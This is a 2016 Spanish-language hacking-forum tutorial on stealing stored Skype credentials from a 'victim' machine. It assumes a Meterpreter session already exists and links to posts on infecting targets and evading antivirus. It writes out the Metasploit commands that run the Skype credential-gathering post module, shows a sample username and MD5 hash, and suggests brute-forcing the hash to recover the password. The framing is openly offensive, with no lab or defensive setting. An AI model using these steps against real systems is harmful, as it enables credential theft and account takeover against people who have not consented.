Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: BrowserNet en Mayo 21, 2016, 08:10:13 pm

Título: Dump skype account our victim for Metasploit
Publicado por: BrowserNet en Mayo 21, 2016, 08:10:13 pm
Dump skype account our victim for Metasploit

(https://1.bp.blogspot.com/-8zw20T8uhcA/VsUmu12hWMI/AAAAAAAADao/G07LaWCLG1U/s400/skype-is-hacked.jpg)

Saludos hermanos nuevamente siguiendo con el pequeño maratón de los complementos de Metasploit Framework jajaja, lo que haremos ahora sera Dumpear los datos de las cuentas almacenadas de nuestras victimas.

(https://1.bp.blogspot.com/-aoBQelMiAW4/VsUoDpjmTHI/AAAAAAAADa0/zmiWn9kqfJg/s640/10.png)

Como ustedes ya saben, necesitamos una Session Meterpreter para conectarnos con nuestra victima y enviar el Exploit remotamente, dejare los siguientes POST donde enseño como hacerlo.

http://www.backtrack-omar.com/2015/09/2015-flash-0day-exploit-hackingteam.html
http://www.backtrack-omar.com/2015/10/vnc-remote-connection-all-windows.html
http://www.backtrack-omar.com/2015/10/beef-browser-exploitation-framework.html
http://www.backtrack-omar.com/2015/10/mitm-man-in-middle-ettercap-mitmf-beef.html
http://www.backtrack-omar.com/2015/10/unicorn-la-herramienta-de-infeccion.html
http://www.backtrack-omar.com/2015/09/explotando-kali-linux-20-cve-2015.html
http://www.backtrack-omar.com/2015/10/evadiendo-av-codificando-payloads-con.html
http://www.backtrack-omar.com/2015/10/winrar-nuestro-viejo-aliado-de.html
http://www.backtrack-omar.com/2015/03/las-viejas-macros-siempre-en-accion.html
http://www.backtrack-omar.com/2014/01/aprendiendo-metasploit-avanzado.html

Una ves explotado el sistema de nuestra victima, como vemos en la siguiente imagen:

(https://3.bp.blogspot.com/-mWv5SfCCIro/VsUo664mpCI/AAAAAAAADa8/0yBowmfLQYc/s1600/2.png)

Añadiremos "Background" para salir de session meterpreter y añadiremos lo siguiente:

Código: You are not allowed to view links. Register or Login
msf exploit(handler) > use post/windows/gather/credentials/skype
msf post(skype) > set SESSION 1
SESSION => 1
msf post(skype) > exploit
en la sintaxis set SESSION 1, añadí el numero 1 por el simple hecho que es la primera session de conexión que hemos recibido.

Si ustedes desean ver la lista de las sesiones lo pueden hacer  añadiendo el comando sessions -i , pero antes deben salir de la session meterpreter mediante background.
Una ves hecho  todo lo siguiente, le daremos Exploit.

(https://1.bp.blogspot.com/-irTHm3hy6po/VsUq2glq3XI/AAAAAAAADbI/53F5UCXK9Y0/s640/1.png)

Como vemos nos Dumpeo la cuenta de Skype registrada de nuestra victima:

El USER de la cuenta la oculte por privacidad, pero la contraseña NO, porque vemos que esta en HASH md5.

Ejemplo:

pepito:018347a360343c4d1b88d8e4dfab756a

(https://2.bp.blogspot.com/-J6QQLKEcKrM/VsUtKeNsG8I/AAAAAAAADbU/MSTfOKj6Dnw/s320/3.png)

Dado lo siguiente, usted puede hacer un ataque de fuerza bruta para obtener la contraseña, Saludos hermanos.